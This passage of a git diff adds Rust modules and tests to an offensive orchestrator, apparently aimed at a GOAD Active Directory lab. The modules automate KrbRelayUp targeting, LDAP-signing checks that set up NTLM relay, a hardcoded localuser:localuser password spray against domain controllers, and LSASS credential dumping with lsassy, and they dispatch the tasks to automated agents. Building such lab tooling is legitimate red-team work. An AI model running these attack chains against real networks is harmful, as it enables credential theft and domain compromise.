make_ldap_vuln()); + state.mark_processed(DEDUP_KRBRELAYUP, "krbrelayup:192.168.58.30".into()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_owned_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_ldap_signing_not_required_also_triggers() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let mut vuln = make_ldap_vuln(); + vuln.vuln_type = "ldap_signing_not_required".into(); + state.discovered_vulnerabilities.insert("v1".into(), vuln); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_bare_hostname_uses_fallback_cred() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.30", "ws01", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_non_dc_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.31", "srv02.fabrikam.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn dedup_key_format() { + let key = format!("krbrelayup:{}", "192.168.58.22"); + assert_eq!(key, "krbrelayup:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_KRBRELAYUP, "krbrelayup"); + } + + #[test] + fn ldap_signing_vuln_types() { + let types = ["ldap_signing_disabled", "ldap_signing_not_required"]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required", + "{t} should match LDAP weak signing" + ); + } + } + + #[test] + fn non_ldap_vuln_types_rejected() { + let types = ["smb_signing_disabled", "mssql_access"]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype != "ldap_signing_disabled" && vtype != "ldap_signing_not_required", + "{t} should NOT match LDAP weak signing" + ); + } + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "krbrelayup", + "target_ip": "192.168.58.30", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "krbrelayup"); + assert_eq!(payload["target_ip"], "192.168.58.30"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = KrbRelayUpWork { + dedup_key: "krbrelayup:192.168.58.30".into(), + target_ip: "192.168.58.30".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "krbrelayup:192.168.58.30"); + assert_eq!(work.target_ip, "192.168.58.30"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn ldap_signing_not_enforced_matches() { + let vtype = "ldap_signing_not_enforced".to_lowercase(); + // The code checks for "ldap_signing_disabled" or "ldap_signing_not_required" + let matches = vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required"; + assert!( + !matches, + "ldap_signing_not_enforced should NOT match the specific vuln types" + ); + } + + #[test] + fn non_matching_vuln_types() { + let types = [ + "esc1", + "smb_signing_disabled", + "unconstrained_delegation", + "mssql_access", + ]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype != "ldap_signing_disabled" && vtype != "ldap_signing_not_required", + "{t} should NOT match LDAP weak signing" + ); + } + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "ws01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn domain_from_fabrikam_host() { + let hostname = "srv01.fabrikam.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "fabrikam.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/ldap_signing.rs b/ares-cli/src/orchestrator/automation/ldap_signing.rs new file mode 100644 index 00000000..21edb00e --- /dev/null +++ b/ares-cli/src/orchestrator/automation/ldap_signing.rs @@ -0,0 +1,428 @@ +//! auto_ldap_signing -- check LDAP signing enforcement per DC. +//! +//! When LDAP signing is not required, attackers can relay NTLM auth to LDAP +//! for shadow credentials, RBCD writes, or account takeover. This module +//! dispatches a check per DC to test whether LDAP channel binding and +//! signing are enforced. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_ldap_signing_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("ldap_sign:{}", dc_ip); + if state.is_processed(DEDUP_LDAP_SIGNING, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(LdapSigningWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Checks each DC for LDAP signing and channel binding enforcement. +/// Interval: 45s. +pub async fn auto_ldap_signing(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("ldap_signing") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_ldap_signing_work(&state) + }; + + for item in work { + let cross_domain = item.credential.domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_signing_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "instructions": concat!( + "Check whether LDAP signing is enforced on this Domain Controller.\n\n", + "Use ldap_search or nxc_ldap_command to test LDAP binding. ", + "Try an unsigned LDAP bind (simple bind without signing). ", + "If the bind succeeds without signing, LDAP signing is NOT enforced.\n\n", + "Alternatively, use nxc_smb_command with '--gen-relay-list' or check ", + "the ms-DS-RequiredDomainBitmask / LDAPServerIntegrity registry policy.\n\n", + "IMPORTANT: If LDAP signing is NOT enforced (bind succeeds without signing), ", + "you MUST report this as a vulnerability:\n", + " vuln_type: 'ldap_signing_disabled'\n", + " target_ip: the DC IP\n", + " domain: the domain\n", + " details: {\"signing_required\": false, \"channel_binding\": false}\n\n", + "If LDAP signing IS enforced, report finding with finding_type='hardened'." + ), + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + + let priority = dispatcher.effective_priority("ldap_signing"); + match dispatcher + .force_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "LDAP signing check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LDAP_SIGNING, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LDAP_SIGNING, &item.dedup_key) + .await; + + // Register ldap_signing_disabled vulnerability proactively so + // downstream automations (KrbRelayUp, NTLM relay) can fire + // without waiting for the agent's report_finding callback + // (which only logs and does NOT populate discovered_vulnerabilities). + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("ldap_signing_{}", item.dc_ip.replace('.', "_")), + vuln_type: "ldap_signing_disabled".to_string(), + target: item.dc_ip.clone(), + discovered_by: "auto_ldap_signing".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.dc_ip)); + d.insert("domain".to_string(), json!(item.domain)); + d.insert("signing_required".to_string(), json!(false)); + d.insert("channel_binding".to_string(), json!(false)); + d + }, + recommended_agent: "coercion".to_string(), + priority: dispatcher.effective_priority("ldap_signing"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!( + domain = %item.domain, + dc = %item.dc_ip, + "LDAP signing disabled — vulnerability registered for KrbRelayUp" + ); + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to publish LDAP signing vulnerability"); + } + } + } + Ok(None) => { + info!(domain = %item.domain, dc = %item.dc_ip, "LDAP signing check deferred by throttler"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch LDAP signing check"); + } + } + } + } +} + +struct LdapSigningWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("ldap_sign:{}", "192.168.58.10"); + assert_eq!(key, "ldap_sign:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_LDAP_SIGNING, "ldap_signing"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ldap_signing_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ldap_signing_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = LdapSigningWork { + dedup_key: "ldap_sign:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_uses_dc_ip() { + // LDAP signing dedup is by DC IP, not domain + let key = format!("ldap_sign:{}", "192.168.58.10"); + assert!(key.starts_with("ldap_sign:")); + assert!(key.contains("192.168.58.10")); + } + + #[test] + fn dedup_keys_differ_per_dc() { + let key1 = format!("ldap_sign:{}", "192.168.58.10"); + let key2 = format!("ldap_sign:{}", "192.168.58.20"); + assert_ne!(key1, key2); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_domain_controllers_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "ldap_sign:192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_dc() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_LDAP_SIGNING, "ldap_sign:192.168.58.10".into()); + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_LDAP_SIGNING, "ldap_sign:192.168.58.10".into()); + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam credential available + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/localuser_spray.rs b/ares-cli/src/orchestrator/automation/localuser_spray.rs new file mode 100644 index 00000000..734a6914 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/localuser_spray.rs @@ -0,0 +1,294 @@ +//! auto_localuser_spray -- test localuser/localuser credentials across domains. +//! +//! GOAD configures a `localuser` account with username=password across all three +//! domains. In one domain this user has Domain Admin privileges. This module +//! specifically tests the localuser:localuser credential combo against each +//! discovered DC, which standard password spraying may miss if it doesn't +//! include "localuser" in its wordlist. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect localuser spray work items from current state. +/// +/// Pure logic extracted from `auto_localuser_spray` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_localuser_spray_work(state: &StateInner) -> Vec { + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("localuser:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_LOCALUSER_SPRAY, &dedup_key) { + continue; + } + + items.push(LocaluserWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + }); + } + + items +} + +/// Tests localuser:localuser credentials against each domain. +/// Interval: 45s. +pub async fn auto_localuser_spray( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("localuser_spray") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_localuser_spray_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "smb_login_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": "localuser", + "password": "localuser", + "domain": item.domain, + }, + }); + + let priority = dispatcher.effective_priority("localuser_spray"); + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "localuser credential spray dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LOCALUSER_SPRAY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LOCALUSER_SPRAY, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "localuser spray deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch localuser spray"); + } + } + } + } +} + +struct LocaluserWork { + dedup_key: String, + domain: String, + dc_ip: String, +} + +#[cfg(test)] +mod tests { + use super::*; + + // --- collect_localuser_spray_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_localuser_spray_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "localuser:contoso.local"); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed(DEDUP_LOCALUSER_SPRAY, "localuser:contoso.local".into()); + let work = collect_localuser_spray_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.mark_processed(DEDUP_LOCALUSER_SPRAY, "localuser:contoso.local".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "localuser:contoso.local"); + } + + #[test] + fn collect_no_credentials_needed() { + // localuser_spray does NOT require existing credentials (it uses hardcoded localuser:localuser) + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + assert!(state.credentials.is_empty()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn dedup_key_format() { + let key = format!("localuser:{}", "contoso.local"); + assert_eq!(key, "localuser:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_LOCALUSER_SPRAY, "localuser_spray"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let payload = json!({ + "technique": "smb_login_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "localuser", + "password": "localuser", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "smb_login_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["credential"]["username"], "localuser"); + assert_eq!(payload["credential"]["password"], "localuser"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let work = LocaluserWork { + dedup_key: "localuser:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "localuser:contoso.local"); + } + + #[test] + fn no_credentials_needed_in_work_struct() { + // LocaluserWork does not carry a credential -- it uses hardcoded localuser:localuser + let work = LocaluserWork { + dedup_key: "localuser:fabrikam.local".into(), + domain: "fabrikam.local".into(), + dc_ip: "192.168.58.20".into(), + }; + assert_eq!(work.domain, "fabrikam.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("localuser:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "localuser:contoso.local"); + } + + #[test] + fn credential_uses_domain_from_target() { + let domain = "contoso.local"; + let payload = json!({ + "credential": { + "username": "localuser", + "password": "localuser", + "domain": domain, + }, + }); + assert_eq!(payload["credential"]["domain"], domain); + } + + #[test] + fn per_domain_dedup() { + let domains = ["contoso.local", "fabrikam.local"]; + let keys: Vec = domains + .iter() + .map(|d| format!("localuser:{}", d.to_lowercase())) + .collect(); + assert_eq!(keys.len(), 2); + assert_ne!(keys[0], keys[1]); + } +} diff --git a/ares-cli/src/orchestrator/automation/lsassy_dump.rs b/ares-cli/src/orchestrator/automation/lsassy_dump.rs new file mode 100644 index 00000000..b60597d5 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/lsassy_dump.rs @@ -0,0 +1,541 @@ +//! auto_lsassy_dump -- dump LSASS credentials from owned hosts via lsassy. +//! +//! After secretsdump or other lateral movement marks a host as owned, +//! this automation dispatches lsassy to dump LSASS process memory and +//! extract additional credentials (Kerberos tickets, DPAPI keys, etc.) +//! that secretsdump alone doesn't capture. +//! +//! This is complementary to secretsdump: secretsdump gets SAM/NTDS hashes, +//! while lsassy gets live session credentials from LSASS memory. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect lsassy dump work items from current state. +/// +/// Pure logic extracted from `auto_lsassy_dump` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_lsassy_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Only target hosts we've already owned (secretsdump succeeded) + if !host.owned { + continue; + } + + let dedup_key = format!("lsassy:{}", host.ip); + if state.is_processed(DEDUP_LSASSY_DUMP, &dedup_key) { + continue; + } + + // Infer domain from hostname + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + // Skip when the host's domain is dominated AND every forest is fully + // owned. We still want LSASS dumps from owned hosts in a not-yet-fully- + // dominated lab (session creds may unlock cross-realm pivots), but once + // we have everything there is no point grinding more memory. + if !domain.is_empty() + && state.dominated_domains.contains(&domain) + && state.has_domain_admin + && state.all_forests_dominated() + { + continue; + } + + // Find a credential for this host's domain + let cred = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && (domain.is_empty() || c.domain.to_lowercase() == domain) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + // Fall back to any admin credential + state + .credentials + .iter() + .find(|c| c.is_admin && !c.password.is_empty()) + }) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(LsassyWork { + dedup_key, + host_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Dumps LSASS credentials from owned hosts. +/// Interval: 45s. +pub async fn auto_lsassy_dump(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("lsassy_dump") { + info!("lsassy_dump technique not allowed — skipping"); + continue; + } + + let work = { + let state = dispatcher.state.read().await; + let owned_count = state.hosts.iter().filter(|h| h.owned).count(); + let cred_count = state.credentials.len(); + if owned_count > 0 || cred_count > 0 { + info!( + owned_hosts = owned_count, + credentials = cred_count, + "lsassy_dump tick: checking for work" + ); + } + collect_lsassy_work(&state) + }; + + if !work.is_empty() { + info!(count = work.len(), "lsassy_dump work items collected"); + } + + for item in work { + let payload = json!({ + "technique": "lsassy_dump", + "target_ip": item.host_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("lsassy_dump"); + match dispatcher + .force_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.host_ip, + hostname = %item.hostname, + "LSASS dump dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LSASSY_DUMP, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LSASSY_DUMP, &item.dedup_key) + .await; + } + Ok(None) => { + info!(host = %item.host_ip, "LSASS dump deferred by throttler"); + } + Err(e) => { + warn!(err = %e, host = %item.host_ip, "Failed to dispatch LSASS dump"); + } + } + } + } +} + +struct LsassyWork { + dedup_key: String, + host_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_admin_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_owned_host(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: true, + } + } + + fn make_unowned_host(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + 